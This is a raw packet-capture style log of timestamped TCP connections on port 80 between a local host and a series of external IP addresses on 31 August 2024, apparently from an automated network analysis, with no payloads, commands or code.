Aug 31, 2024 14:04:35.223664999 CEST	58103	80	192.168.2.4	85.159.66.93
Aug 31, 2024 14:04:35.228538990 CEST	80	58103	85.159.66.93	192.168.2.4
Aug 31, 2024 14:04:35.922168970 CEST	80	58103	85.159.66.93	192.168.2.4
Aug 31, 2024 14:04:35.922463894 CEST	80	58103	85.159.66.93	192.168.2.4
Aug 31, 2024 14:04:35.922523975 CEST	58103	80	192.168.2.4	85.159.66.93
Aug 31, 2024 14:04:36.734925032 CEST	58103	80	192.168.2.4	85.159.66.93
Aug 31, 2024 14:04:37.752860069 CEST	58104	80	192.168.2.4	85.159.66.93
Aug 31, 2024 14:04:37.758373976 CEST	80	58104	85.159.66.93	192.168.2.4
Aug 31, 2024 14:04:37.758460999 CEST	58104	80	192.168.2.4	85.159.66.93
Aug 31, 2024 14:04:37.770211935 CEST	58104	80	192.168.2.4	85.159.66.93
Aug 31, 2024 14:04:37.775291920 CEST	80	58104	85.159.66.93	192.168.2.4
Aug 31, 2024 14:04:37.775377989 CEST	80	58104	85.159.66.93	192.168.2.4
Aug 31, 2024 14:04:37.775388956 CEST	80	58104	85.159.66.93	192.168.2.4
Aug 31, 2024 14:04:37.775474072 CEST	80	58104	85.159.66.93	192.168.2.4
Aug 31, 2024 14:04:37.775482893 CEST	80	58104	85.159.66.93	192.168.2.4
Aug 31, 2024 14:04:37.775522947 CEST	80	58104	85.159.66.93	192.168.2.4
Aug 31, 2024 14:04:37.775532007 CEST	80	58104	85.159.66.93	192.168.2.4
Aug 31, 2024 14:04:37.775676012 CEST	80	58104	85.159.66.93	192.168.2.4
Aug 31, 2024 14:04:37.775927067 CEST	80	58104	85.159.66.93	192.168.2.4
Aug 31, 2024 14:04:38.471446991 CEST	80	58104	85.159.66.93	192.168.2.4
Aug 31, 2024 14:04:38.471564054 CEST	80	58104	85.159.66.93	192.168.2.4
Aug 31, 2024 14:04:38.471609116 CEST	58104	80	192.168.2.4	85.159.66.93
Aug 31, 2024 14:04:39.281491995 CEST	58104	80	192.168.2.4	85.159.66.93
Aug 31, 2024 14:04:40.299900055 CEST	58105	80	192.168.2.4	85.159.66.93
Aug 31, 2024 14:04:40.304896116 CEST	80	58105	85.159.66.93	192.168.2.4
Aug 31, 2024 14:04:40.304986954 CEST	58105	80	192.168.2.4	85.159.66.93
Aug 31, 2024 14:04:40.312494993 CEST	58105	80	192.168.2.4	85.159.66.93
Aug 31, 2024 14:04:40.317948103 CEST	80	58105	85.159.66.93	192.168.2.4
Aug 31, 2024 14:04:40.990497112 CEST	80	58105	85.159.66.93	192.168.2.4
Aug 31, 2024 14:04:40.990623951 CEST	80	58105	85.159.66.93	192.168.2.4
Aug 31, 2024 14:04:40.990766048 CEST	58105	80	192.168.2.4	85.159.66.93
Aug 31, 2024 14:04:40.993221045 CEST	58105	80	192.168.2.4	85.159.66.93
Aug 31, 2024 14:04:40.998024940 CEST	80	58105	85.159.66.93	192.168.2.4
Aug 31, 2024 14:04:46.056406975 CEST	58106	80	192.168.2.4	84.32.84.32
Aug 31, 2024 14:04:46.061347961 CEST	80	58106	84.32.84.32	192.168.2.4
Aug 31, 2024 14:04:46.061423063 CEST	58106	80	192.168.2.4	84.32.84.32
Aug 31, 2024 14:04:46.072741985 CEST	58106	80	192.168.2.4	84.32.84.32
Aug 31, 2024 14:04:46.077672005 CEST	80	58106	84.32.84.32	192.168.2.4
Aug 31, 2024 14:04:46.645661116 CEST	80	58106	84.32.84.32	192.168.2.4
Aug 31, 2024 14:04:46.645720959 CEST	58106	80	192.168.2.4	84.32.84.32
Aug 31, 2024 14:04:47.587865114 CEST	58106	80	192.168.2.4	84.32.84.32
Aug 31, 2024 14:04:47.592839956 CEST	80	58106	84.32.84.32	192.168.2.4
Aug 31, 2024 14:04:48.595683098 CEST	58107	80	192.168.2.4	84.32.84.32
Aug 31, 2024 14:04:48.600629091 CEST	80	58107	84.32.84.32	192.168.2.4
Aug 31, 2024 14:04:48.600711107 CEST	58107	80	192.168.2.4	84.32.84.32
Aug 31, 2024 14:04:48.611126900 CEST	58107	80	192.168.2.4	84.32.84.32
Aug 31, 2024 14:04:48.616033077 CEST	80	58107	84.32.84.32	192.168.2.4
Aug 31, 2024 14:04:49.060349941 CEST	80	58107	84.32.84.32	192.168.2.4
Aug 31, 2024 14:04:49.060421944 CEST	58107	80	192.168.2.4	84.32.84.32
Aug 31, 2024 14:04:50.124560118 CEST	58107	80	192.168.2.4	84.32.84.32
Aug 31, 2024 14:04:50.129455090 CEST	80	58107	84.32.84.32	192.168.2.4
Aug 31, 2024 14:04:51.146742105 CEST	58108	80	192.168.2.4	84.32.84.32
Aug 31, 2024 14:04:51.152040958 CEST	80	58108	84.32.84.32	192.168.2.4
Aug 31, 2024 14:04:51.152853966 CEST	58108	80	192.168.2.4	84.32.84.32
Aug 31, 2024 14:04:51.164772987 CEST	58108	80	192.168.2.4	84.32.84.32
Aug 31, 2024 14:04:51.169931889 CEST	80	58108	84.32.84.32	192.168.2.4
Aug 31, 2024 14:04:51.169943094 CEST	80	58108	84.32.84.32	192.168.2.4
Aug 31, 2024 14:04:51.169994116 CEST	80	58108	84.32.84.32	192.168.2.4
Aug 31, 2024 14:04:51.170001984 CEST	80	58108	84.32.84.32	192.168.2.4
Aug 31, 2024 14:04:51.170010090 CEST	80	58108	84.32.84.32	192.168.2.4
Aug 31, 2024 14:04:51.170094013 CEST	80	58108	84.32.84.32	192.168.2.4
Aug 31, 2024 14:04:51.170101881 CEST	80	58108	84.32.84.32	192.168.2.4
Aug 31, 2024 14:04:51.170109987 CEST	80	58108	84.32.84.32	192.168.2.4
Aug 31, 2024 14:04:51.170119047 CEST	80	58108	84.32.84.32	192.168.2.4
Aug 31, 2024 14:04:51.616810083 CEST	80	58108	84.32.84.32	192.168.2.4
Aug 31, 2024 14:04:51.616914034 CEST	58108	80	192.168.2.4	84.32.84.32
Aug 31, 2024 14:04:52.671372890 CEST	58108	80	192.168.2.4	84.32.84.32
Aug 31, 2024 14:04:52.676305056 CEST	80	58108	84.32.84.32	192.168.2.4
Aug 31, 2024 14:04:53.689768076 CEST	58109	80	192.168.2.4	84.32.84.32
Aug 31, 2024 14:04:53.696116924 CEST	80	58109	84.32.84.32	192.168.2.4
Aug 31, 2024 14:04:53.698791981 CEST	58109	80	192.168.2.4	84.32.84.32
Aug 31, 2024 14:04:53.710745096 CEST	58109	80	192.168.2.4	84.32.84.32
Aug 31, 2024 14:04:53.716310024 CEST	80	58109	84.32.84.32	192.168.2.4
Aug 31, 2024 14:04:54.158849955 CEST	80	58109	84.32.84.32	192.168.2.4
Aug 31, 2024 14:04:54.158941984 CEST	80	58109	84.32.84.32	192.168.2.4
Aug 31, 2024 14:04:54.158953905 CEST	80	58109	84.32.84.32	192.168.2.4
Aug 31, 2024 14:04:54.158965111 CEST	80	58109	84.32.84.32	192.168.2.4
Aug 31, 2024 14:04:54.158974886 CEST	80	58109	84.32.84.32	192.168.2.4
Aug 31, 2024 14:04:54.158986092 CEST	80	58109	84.32.84.32	192.168.2.4
Aug 31, 2024 14:04:54.158993006 CEST	58109	80	192.168.2.4	84.32.84.32
Aug 31, 2024 14:04:54.158997059 CEST	80	58109	84.32.84.32	192.168.2.4
Aug 31, 2024 14:04:54.159007072 CEST	80	58109	84.32.84.32	192.168.2.4
Aug 31, 2024 14:04:54.159019947 CEST	80	58109	84.32.84.32	192.168.2.4
Aug 31, 2024 14:04:54.159060001 CEST	58109	80	192.168.2.4	84.32.84.32
Aug 31, 2024 14:04:54.159095049 CEST	58109	80	192.168.2.4	84.32.84.32
Aug 31, 2024 14:04:54.160109997 CEST	80	58109	84.32.84.32	192.168.2.4
Aug 31, 2024 14:04:54.160146952 CEST	58109	80	192.168.2.4	84.32.84.32
Aug 31, 2024 14:04:54.164258957 CEST	58109	80	192.168.2.4	84.32.84.32
Aug 31, 2024 14:04:54.169397116 CEST	80	58109	84.32.84.32	192.168.2.4
Aug 31, 2024 14:05:07.271967888 CEST	58110	80	192.168.2.4	154.23.184.218
Aug 31, 2024 14:05:07.276956081 CEST	80	58110	154.23.184.218	192.168.2.4
Aug 31, 2024 14:05:07.278934956 CEST	58110	80	192.168.2.4	154.23.184.218
Aug 31, 2024 14:05:07.290770054 CEST	58110	80	192.168.2.4	154.23.184.218
Aug 31, 2024 14:05:07.295681000 CEST	80	58110	154.23.184.218	192.168.2.4
Aug 31, 2024 14:05:08.197376013 CEST	80	58110	154.23.184.218	192.168.2.4
Aug 31, 2024 14:05:08.197797060 CEST	80	58110	154.23.184.218	192.168.2.4
Aug 31, 2024 14:05:08.197843075 CEST	58110	80	192.168.2.4	154.23.184.218
Aug 31, 2024 14:05:08.796402931 CEST	58110	80	192.168.2.4	154.23.184.218
Aug 31, 2024 14:05:09.817261934 CEST	58111	80	192.168.2.4	154.23.184.218
Aug 31, 2024 14:05:09.822345018 CEST	80	58111	154.23.184.218	192.168.2.4
Aug 31, 2024 14:05:09.822419882 CEST	58111	80	192.168.2.4	154.23.184.218
Aug 31, 2024 14:05:09.836461067 CEST	58111	80	192.168.2.4	154.23.184.218
Aug 31, 2024 14:05:09.841326952 CEST	80	58111	154.23.184.218	192.168.2.4
Aug 31, 2024 14:05:10.759993076 CEST	80	58111	154.23.184.218	192.168.2.4
Aug 31, 2024 14:05:10.760050058 CEST	80	58111	154.23.184.218	192.168.2.4
Aug 31, 2024 14:05:10.760149956 CEST	58111	80	192.168.2.4	154.23.184.218
Aug 31, 2024 14:05:11.346784115 CEST	58111	80	192.168.2.4	154.23.184.218
Aug 31, 2024 14:05:12.362433910 CEST	58112	80	192.168.2.4	154.23.184.218
Aug 31, 2024 14:05:12.370488882 CEST	80	58112	154.23.184.218	192.168.2.4
Aug 31, 2024 14:05:12.370554924 CEST	58112	80	192.168.2.4	154.23.184.218
Aug 31, 2024 14:05:12.383183002 CEST	58112	80	192.168.2.4	154.23.184.218
Aug 31, 2024 14:05:12.388839960 CEST	80	58112	154.23.184.218	192.168.2.4
Aug 31, 2024 14:05:12.388849974 CEST	80	58112	154.23.184.218	192.168.2.4
Aug 31, 2024 14:05:12.388856888 CEST	80	58112	154.23.184.218	192.168.2.4
Aug 31, 2024 14:05:12.388864994 CEST	80	58112	154.23.184.218	192.168.2.4
Aug 31, 2024 14:05:12.388973951 CEST	80	58112	154.23.184.218	192.168.2.4
Aug 31, 2024 14:05:12.389122963 CEST	80	58112	154.23.184.218	192.168.2.4
Aug 31, 2024 14:05:12.389132023 CEST	80	58112	154.23.184.218	192.168.2.4
Aug 31, 2024 14:05:12.389141083 CEST	80	58112	154.23.184.218	192.168.2.4
Aug 31, 2024 14:05:12.389270067 CEST	80	58112	154.23.184.218	192.168.2.4
Aug 31, 2024 14:05:13.600126028 CEST	80	58112	154.23.184.218	192.168.2.4
Aug 31, 2024 14:05:13.600156069 CEST	80	58112	154.23.184.218	192.168.2.4
Aug 31, 2024 14:05:13.600164890 CEST	80	58112	154.23.184.218	192.168.2.4
Aug 31, 2024 14:05:13.600379944 CEST	58112	80	192.168.2.4	154.23.184.218
Aug 31, 2024 14:05:13.890279055 CEST	58112	80	192.168.2.4	154.23.184.218
Aug 31, 2024 14:05:14.910742044 CEST	58113	80	192.168.2.4	154.23.184.218
Aug 31, 2024 14:05:14.915827990 CEST	80	58113	154.23.184.218	192.168.2.4
Aug 31, 2024 14:05:14.915914059 CEST	58113	80	192.168.2.4	154.23.184.218
Aug 31, 2024 14:05:14.944926977 CEST	58113	80	192.168.2.4	154.23.184.218
Aug 31, 2024 14:05:14.950258017 CEST	80	58113	154.23.184.218	192.168.2.4
Aug 31, 2024 14:05:15.835457087 CEST	80	58113	154.23.184.218	192.168.2.4
Aug 31, 2024 14:05:15.835999012 CEST	80	58113	154.23.184.218	192.168.2.4
Aug 31, 2024 14:05:15.836051941 CEST	58113	80	192.168.2.4	154.23.184.218
Aug 31, 2024 14:05:15.838907957 CEST	58113	80	192.168.2.4	154.23.184.218
Aug 31, 2024 14:05:15.843981028 CEST	80	58113	154.23.184.218	192.168.2.4
Aug 31, 2024 14:05:22.078844070 CEST	58114	80	192.168.2.4	200.58.111.42
Aug 31, 2024 14:05:22.083941936 CEST	80	58114	200.58.111.42	192.168.2.4
Aug 31, 2024 14:05:22.084013939 CEST	58114	80	192.168.2.4	200.58.111.42
Aug 31, 2024 14:05:22.098556042 CEST	58114	80	192.168.2.4	200.58.111.42
Aug 31, 2024 14:05:22.103831053 CEST	80	58114	200.58.111.42	192.168.2.4
Aug 31, 2024 14:05:23.609813929 CEST	58114	80	192.168.2.4	200.58.111.42
Aug 31, 2024 14:05:23.744191885 CEST	80	58114	200.58.111.42	192.168.2.4
Aug 31, 2024 14:05:23.744206905 CEST	80	58114	200.58.111.42	192.168.2.4
Aug 31, 2024 14:05:23.744215012 CEST	80	58114	200.58.111.42	192.168.2.4
Aug 31, 2024 14:05:23.744350910 CEST	58114	80	192.168.2.4	200.58.111.42
Aug 31, 2024 14:05:23.744350910 CEST	58114	80	192.168.2.4	200.58.111.42
Aug 31, 2024 14:05:23.744415998 CEST	80	58114	200.58.111.42	192.168.2.4
Aug 31, 2024 14:05:23.744435072 CEST	58114	80	192.168.2.4	200.58.111.42
Aug 31, 2024 14:05:23.744576931 CEST	58114	80	192.168.2.4	200.58.111.42
Aug 31, 2024 14:05:23.744863987 CEST	80	58114	200.58.111.42	192.168.2.4
Aug 31, 2024 14:05:23.746437073 CEST	80	58114	200.58.111.42	192.168.2.4
Aug 31, 2024 14:05:23.750828028 CEST	58114	80	192.168.2.4	200.58.111.42
Aug 31, 2024 14:05:23.750828981 CEST	58114	80	192.168.2.4	200.58.111.42
Aug 31, 2024 14:05:24.628700972 CEST	58115	80	192.168.2.4	200.58.111.42
Aug 31, 2024 14:05:24.633739948 CEST	80	58115	200.58.111.42	192.168.2.4
Aug 31, 2024 14:05:24.633800030 CEST	58115	80	192.168.2.4	200.58.111.42
Aug 31, 2024 14:05:24.648453951 CEST	58115	80	192.168.2.4	200.58.111.42
Aug 31, 2024 14:05:24.653223038 CEST	80	58115	200.58.111.42	192.168.2.4
Aug 31, 2024 14:05:25.353162050 CEST	80	58115	200.58.111.42	192.168.2.4
Aug 31, 2024 14:05:25.353491068 CEST	80	58115	200.58.111.42	192.168.2.4
Aug 31, 2024 14:05:25.353632927 CEST	58115	80	192.168.2.4	200.58.111.42
Aug 31, 2024 14:05:26.155930996 CEST	58115	80	192.168.2.4	200.58.111.42
Aug 31, 2024 14:05:27.179487944 CEST	58116	80	192.168.2.4	200.58.111.42
Aug 31, 2024 14:05:27.184731007 CEST	80	58116	200.58.111.42	192.168.2.4
Aug 31, 2024 14:05:27.184839964 CEST	58116	80	192.168.2.4	200.58.111.42
Aug 31, 2024 14:05:27.197870970 CEST	58116	80	192.168.2.4	200.58.111.42
Aug 31, 2024 14:05:27.202956915 CEST	80	58116	200.58.111.42	192.168.2.4
Aug 31, 2024 14:05:27.202966928 CEST	80	58116	200.58.111.42	192.168.2.4
Aug 31, 2024 14:05:27.203104019 CEST	80	58116	200.58.111.42	192.168.2.4
Aug 31, 2024 14:05:27.203113079 CEST	80	58116	200.58.111.42	192.168.2.4
Aug 31, 2024 14:05:27.203120947 CEST	80	58116	200.58.111.42	192.168.2.4
Aug 31, 2024 14:05:27.203129053 CEST	80	58116	200.58.111.42	192.168.2.4
Aug 31, 2024 14:05:27.203160048 CEST	80	58116	200.58.111.42	192.168.2.4
Aug 31, 2024 14:05:27.203167915 CEST	80	58116	200.58.111.42	192.168.2.4
Aug 31, 2024 14:05:27.203180075 CEST	80	58116	200.58.111.42	192.168.2.4
Aug 31, 2024 14:05:27.929392099 CEST	80	58116	200.58.111.42	192.168.2.4
Aug 31, 2024 14:05:27.929847956 CEST	80	58116	200.58.111.42	192.168.2.4
Aug 31, 2024 14:05:27.929913998 CEST	58116	80	192.168.2.4	200.58.111.42
Aug 31, 2024 14:05:28.705676079 CEST	58116	80	192.168.2.4	200.58.111.42
Aug 31, 2024 14:05:29.721497059 CEST	58117	80	192.168.2.4	200.58.111.42
Aug 31, 2024 14:05:29.726416111 CEST	80	58117	200.58.111.42	192.168.2.4
Aug 31, 2024 14:05:29.726553917 CEST	58117	80	192.168.2.4	200.58.111.42
Aug 31, 2024 14:05:29.736187935 CEST	58117	80	192.168.2.4	200.58.111.42
Aug 31, 2024 14:05:29.741163969 CEST	80	58117	200.58.111.42	192.168.2.4
Aug 31, 2024 14:05:30.463216066 CEST	80	58117	200.58.111.42	192.168.2.4
Aug 31, 2024 14:05:30.463587046 CEST	80	58117	200.58.111.42	192.168.2.4
Aug 31, 2024 14:05:30.463644028 CEST	58117	80	192.168.2.4	200.58.111.42
Aug 31, 2024 14:05:30.465801001 CEST	58117	80	192.168.2.4	200.58.111.42
Aug 31, 2024 14:05:30.472974062 CEST	80	58117	200.58.111.42	192.168.2.4
Aug 31, 2024 14:05:35.494139910 CEST	58118	80	192.168.2.4	13.248.169.48
Aug 31, 2024 14:05:35.499264956 CEST	80	58118	13.248.169.48	192.168.2.4
Aug 31, 2024 14:05:35.501919985 CEST	58118	80	192.168.2.4	13.248.169.48
Aug 31, 2024 14:05:35.512537956 CEST	58118	80	192.168.2.4	13.248.169.48
Aug 31, 2024 14:05:35.518234015 CEST	80	58118	13.248.169.48	192.168.2.4
Aug 31, 2024 14:05:35.972623110 CEST	80	58118	13.248.169.48	192.168.2.4
Aug 31, 2024 14:05:35.972685099 CEST	58118	80	192.168.2.4	13.248.169.48
Aug 31, 2024 14:05:37.022948027 CEST	58118	80	192.168.2.4	13.248.169.48
Aug 31, 2024 14:05:37.042262077 CEST	80	58118	13.248.169.48	192.168.2.4
Aug 31, 2024 14:05:38.035171986 CEST	58119	80	192.168.2.4	13.248.169.48
Aug 31, 2024 14:05:38.040103912 CEST	80	58119	13.248.169.48	192.168.2.4
Aug 31, 2024 14:05:38.040177107 CEST	58119	80	192.168.2.4	13.248.169.48
Aug 31, 2024 14:05:38.053417921 CEST	58119	80	192.168.2.4	13.248.169.48
Aug 31, 2024 14:05:38.058229923 CEST	80	58119	13.248.169.48	192.168.2.4
Aug 31, 2024 14:05:38.502351046 CEST	80	58119	13.248.169.48	192.168.2.4
Aug 31, 2024 14:05:38.502410889 CEST	58119	80	192.168.2.4	13.248.169.48
Aug 31, 2024 14:05:39.566817045 CEST	58119	80	192.168.2.4	13.248.169.48
Aug 31, 2024 14:05:39.571706057 CEST	80	58119	13.248.169.48	192.168.2.4
Aug 31, 2024 14:05:40.580739021 CEST	58120	80	192.168.2.4	13.248.169.48
Aug 31, 2024 14:05:40.585674047 CEST	80	58120	13.248.169.48	192.168.2.4
Aug 31, 2024 14:05:40.585752964 CEST	58120	80	192.168.2.4	13.248.169.48
Aug 31, 2024 14:05:40.597640991 CEST	58120	80	192.168.2.4	13.248.169.48
Aug 31, 2024 14:05:40.602636099 CEST	80	58120	13.248.169.48	192.168.2.4
Aug 31, 2024 14:05:40.602726936 CEST	80	58120	13.248.169.48	192.168.2.4
Aug 31, 2024 14:05:40.602740049 CEST	80	58120	13.248.169.48	192.168.2.4
Aug 31, 2024 14:05:40.602806091 CEST	80	58120	13.248.169.48	192.168.2.4
Aug 31, 2024 14:05:40.602814913 CEST	80	58120	13.248.169.48	192.168.2.4
Aug 31, 2024 14:05:40.602822065 CEST	80	58120	13.248.169.48	192.168.2.4
Aug 31, 2024 14:05:40.602833033 CEST	80	58120	13.248.169.48	192.168.2.4
Aug 31, 2024 14:05:40.602840900 CEST	80	58120	13.248.169.48	192.168.2.4
Aug 31, 2024 14:05:40.602876902 CEST	80	58120	13.248.169.48	192.168.2.4
Aug 31, 2024 14:05:41.052757025 CEST	80	58120	13.248.169.48	192.168.2.4
Aug 31, 2024 14:05:41.054857016 CEST	58120	80	192.168.2.4	13.248.169.48
Aug 31, 2024 14:05:42.109097958 CEST	58120	80	192.168.2.4	13.248.169.48
Aug 31, 2024 14:05:42.114001989 CEST	80	58120	13.248.169.48	192.168.2.4
Aug 31, 2024 14:05:43.130836010 CEST	58121	80	192.168.2.4	13.248.169.48
Aug 31, 2024 14:05:43.135860920 CEST	80	58121	13.248.169.48	192.168.2.4
Aug 31, 2024 14:05:43.142824888 CEST	58121	80	192.168.2.4	13.248.169.48
Aug 31, 2024 14:05:43.145845890 CEST	58121	80	192.168.2.4	13.248.169.48
Aug 31, 2024 14:05:43.150707006 CEST	80	58121	13.248.169.48	192.168.2.4
Aug 31, 2024 14:05:43.629129887 CEST	80	58121	13.248.169.48	192.168.2.4
Aug 31, 2024 14:05:43.629389048 CEST	80	58121	13.248.169.48	192.168.2.4
Aug 31, 2024 14:05:43.637485981 CEST	58121	80	192.168.2.4	13.248.169.48
Aug 31, 2024 14:05:43.637485981 CEST	58121	80	192.168.2.4	13.248.169.48
Aug 31, 2024 14:05:43.642386913 CEST	80	58121	13.248.169.48	192.168.2.4
Aug 31, 2024 14:05:48.856214046 CEST	58122	80	192.168.2.4	52.71.57.184
Aug 31, 2024 14:05:48.861185074 CEST	80	58122	52.71.57.184	192.168.2.4
Aug 31, 2024 14:05:48.861265898 CEST	58122	80	192.168.2.4	52.71.57.184
Aug 31, 2024 14:05:48.872093916 CEST	58122	80	192.168.2.4	52.71.57.184
Aug 31, 2024 14:05:48.877260923 CEST	80	58122	52.71.57.184	192.168.2.4
Aug 31, 2024 14:05:49.402790070 CEST	80	58122	52.71.57.184	192.168.2.4
Aug 31, 2024 14:05:49.402952909 CEST	80	58122	52.71.57.184	192.168.2.4
Aug 31, 2024 14:05:49.403177023 CEST	58122	80	192.168.2.4	52.71.57.184
Aug 31, 2024 14:05:50.377536058 CEST	58122	80	192.168.2.4	52.71.57.184
Aug 31, 2024 14:05:51.393268108 CEST	58123	80	192.168.2.4	52.71.57.184
Aug 31, 2024 14:05:51.398180962 CEST	80	58123	52.71.57.184	192.168.2.4
Aug 31, 2024 14:05:51.398308992 CEST	58123	80	192.168.2.4	52.71.57.184
Aug 31, 2024 14:05:51.410881996 CEST	58123	80	192.168.2.4	52.71.57.184
Aug 31, 2024 14:05:51.415715933 CEST	80	58123	52.71.57.184	192.168.2.4
Aug 31, 2024 14:05:51.863382101 CEST	80	58123	52.71.57.184	192.168.2.4
Aug 31, 2024 14:05:51.863460064 CEST	80	58123	52.71.57.184	192.168.2.4
Aug 31, 2024 14:05:51.863714933 CEST	58123	80	192.168.2.4	52.71.57.184
Aug 31, 2024 14:05:52.923949957 CEST	58123	80	192.168.2.4	52.71.57.184
Aug 31, 2024 14:05:53.940784931 CEST	58124	80	192.168.2.4	52.71.57.184
Aug 31, 2024 14:05:53.946342945 CEST	80	58124	52.71.57.184	192.168.2.4
Aug 31, 2024 14:05:53.946402073 CEST	58124	80	192.168.2.4	52.71.57.184
Aug 31, 2024 14:05:53.959673882 CEST	58124	80	192.168.2.4	52.71.57.184
Aug 31, 2024 14:05:53.964591026 CEST	80	58124	52.71.57.184	192.168.2.4
Aug 31, 2024 14:05:53.964631081 CEST	80	58124	52.71.57.184	192.168.2.4
Aug 31, 2024 14:05:53.964688063 CEST	80	58124	52.71.57.184	192.168.2.4
Aug 31, 2024 14:05:53.964782000 CEST	80	58124	52.71.57.184	192.168.2.4
Aug 31, 2024 14:05:53.964791059 CEST	80	58124	52.71.57.184	192.168.2.4
Aug 31, 2024 14:05:53.964798927 CEST	80	58124	52.71.57.184	192.168.2.4
Aug 31, 2024 14:05:53.964835882 CEST	80	58124	52.71.57.184	192.168.2.4
Aug 31, 2024 14:05:53.964844942 CEST	80	58124	52.71.57.184	192.168.2.4
Aug 31, 2024 14:05:53.964860916 CEST	80	58124	52.71.57.184	192.168.2.4
Aug 31, 2024 14:05:54.420572996 CEST	80	58124	52.71.57.184	192.168.2.4
Aug 31, 2024 14:05:54.420696020 CEST	80	58124	52.71.57.184	192.168.2.4
Aug 31, 2024 14:05:54.420854092 CEST	58124	80	192.168.2.4	52.71.57.184
Aug 31, 2024 14:05:55.470834017 CEST	58124	80	192.168.2.4	52.71.57.184
Aug 31, 2024 14:05:56.487143993 CEST	58125	80	192.168.2.4	52.71.57.184
Aug 31, 2024 14:05:56.492065907 CEST	80	58125	52.71.57.184	192.168.2.4
Aug 31, 2024 14:05:56.492131948 CEST	58125	80	192.168.2.4	52.71.57.184
Aug 31, 2024 14:05:56.499648094 CEST	58125	80	192.168.2.4	52.71.57.184
Aug 31, 2024 14:05:56.504462957 CEST	80	58125	52.71.57.184	192.168.2.4
Aug 31, 2024 14:05:56.970454931 CEST	80	58125	52.71.57.184	192.168.2.4
Aug 31, 2024 14:05:56.970823050 CEST	80	58125	52.71.57.184	192.168.2.4
Aug 31, 2024 14:05:56.972570896 CEST	58125	80	192.168.2.4	52.71.57.184
Aug 31, 2024 14:05:56.974833012 CEST	58125	80	192.168.2.4	52.71.57.184
Aug 31, 2024 14:05:56.979610920 CEST	80	58125	52.71.57.184	192.168.2.4
Aug 31, 2024 14:06:02.427432060 CEST	58126	80	192.168.2.4	45.113.201.77
Aug 31, 2024 14:06:02.432596922 CEST	80	58126	45.113.201.77	192.168.2.4
Aug 31, 2024 14:06:02.432666063 CEST	58126	80	192.168.2.4	45.113.201.77
Aug 31, 2024 14:06:02.450965881 CEST	58126	80	192.168.2.4	45.113.201.77
Aug 31, 2024 14:06:02.455806971 CEST	80	58126	45.113.201.77	192.168.2.4
Aug 31, 2024 14:06:03.316452026 CEST	80	58126	45.113.201.77	192.168.2.4
Aug 31, 2024 14:06:03.316589117 CEST	80	58126	45.113.201.77	192.168.2.4
Aug 31, 2024 14:06:03.316701889 CEST	58126	80	192.168.2.4	45.113.201.77
Aug 31, 2024 14:06:03.952745914 CEST	58126	80	192.168.2.4	45.113.201.77
Aug 31, 2024 14:06:04.974889994 CEST	58127	80	192.168.2.4	45.113.201.77
Aug 31, 2024 14:06:04.979909897 CEST	80	58127	45.113.201.77	192.168.2.4
Aug 31, 2024 14:06:04.986886024 CEST	58127	80	192.168.2.4	45.113.201.77
Aug 31, 2024 14:06:04.992862940 CEST	58127	80	192.168.2.4	45.113.201.77
Aug 31, 2024 14:06:04.997885942 CEST	80	58127	45.113.201.77	192.168.2.4
Aug 31, 2024 14:06:06.086366892 CEST	80	58127	45.113.201.77	192.168.2.4
Aug 31, 2024 14:06:06.086762905 CEST	80	58127	45.113.201.77	192.168.2.4
Aug 31, 2024 14:06:06.086823940 CEST	58127	80	192.168.2.4	45.113.201.77
Aug 31, 2024 14:06:06.499589920 CEST	58127	80	192.168.2.4	45.113.201.77
Aug 31, 2024 14:06:07.518868923 CEST	58128	80	192.168.2.4	45.113.201.77
Aug 31, 2024 14:06:07.523825884 CEST	80	58128	45.113.201.77	192.168.2.4
Aug 31, 2024 14:06:07.523955107 CEST	58128	80	192.168.2.4	45.113.201.77
Aug 31, 2024 14:06:07.535618067 CEST	58128	80	192.168.2.4	45.113.201.77
Aug 31, 2024 14:06:07.540505886 CEST	80	58128	45.113.201.77	192.168.2.4
Aug 31, 2024 14:06:07.540517092 CEST	80	58128	45.113.201.77	192.168.2.4
Aug 31, 2024 14:06:07.540729046 CEST	80	58128	45.113.201.77	192.168.2.4
Aug 31, 2024 14:06:07.540738106 CEST	80	58128	45.113.201.77	192.168.2.4
Aug 31, 2024 14:06:07.540745974 CEST	80	58128	45.113.201.77	192.168.2.4
Aug 31, 2024 14:06:07.540785074 CEST	80	58128	45.113.201.77	192.168.2.4
Aug 31, 2024 14:06:07.540931940 CEST	80	58128	45.113.201.77	192.168.2.4
Aug 31, 2024 14:06:07.540941000 CEST	80	58128	45.113.201.77	192.168.2.4
Aug 31, 2024 14:06:07.540987968 CEST	80	58128	45.113.201.77	192.168.2.4
Aug 31, 2024 14:06:08.474332094 CEST	80	58128	45.113.201.77	192.168.2.4
Aug 31, 2024 14:06:08.474953890 CEST	80	58128	45.113.201.77	192.168.2.4
Aug 31, 2024 14:06:08.475007057 CEST	58128	80	192.168.2.4	45.113.201.77
Aug 31, 2024 14:06:09.050869942 CEST	58128	80	192.168.2.4	45.113.201.77
Aug 31, 2024 14:06:10.203605890 CEST	58129	80	192.168.2.4	45.113.201.77
Aug 31, 2024 14:06:10.208549976 CEST	80	58129	45.113.201.77	192.168.2.4
Aug 31, 2024 14:06:10.208625078 CEST	58129	80	192.168.2.4	45.113.201.77
Aug 31, 2024 14:06:10.220705032 CEST	58129	80	192.168.2.4	45.113.201.77
Aug 31, 2024 14:06:10.225552082 CEST	80	58129	45.113.201.77	192.168.2.4
Aug 31, 2024 14:06:11.114590883 CEST	80	58129	45.113.201.77	192.168.2.4
Aug 31, 2024 14:06:11.114622116 CEST	80	58129	45.113.201.77	192.168.2.4
Aug 31, 2024 14:06:11.114865065 CEST	58129	80	192.168.2.4	45.113.201.77
Aug 31, 2024 14:06:11.120884895 CEST	58129	80	192.168.2.4	45.113.201.77
Aug 31, 2024 14:06:11.126110077 CEST	80	58129	45.113.201.77	192.168.2.4
Aug 31, 2024 14:06:16.332729101 CEST	58130	80	192.168.2.4	154.23.176.197
Aug 31, 2024 14:06:16.337605000 CEST	80	58130	154.23.176.197	192.168.2.4
Aug 31, 2024 14:06:16.337682962 CEST	58130	80	192.168.2.4	154.23.176.197
Aug 31, 2024 14:06:16.351615906 CEST	58130	80	192.168.2.4	154.23.176.197
Aug 31, 2024 14:06:16.356528997 CEST	80	58130	154.23.176.197	192.168.2.4
Aug 31, 2024 14:06:17.326072931 CEST	80	58130	154.23.176.197	192.168.2.4
Aug 31, 2024 14:06:17.326092958 CEST	80	58130	154.23.176.197	192.168.2.4
Aug 31, 2024 14:06:17.326105118 CEST	80	58130	154.23.176.197	192.168.2.4
Aug 31, 2024 14:06:17.326263905 CEST	80	58130	154.23.176.197	192.168.2.4
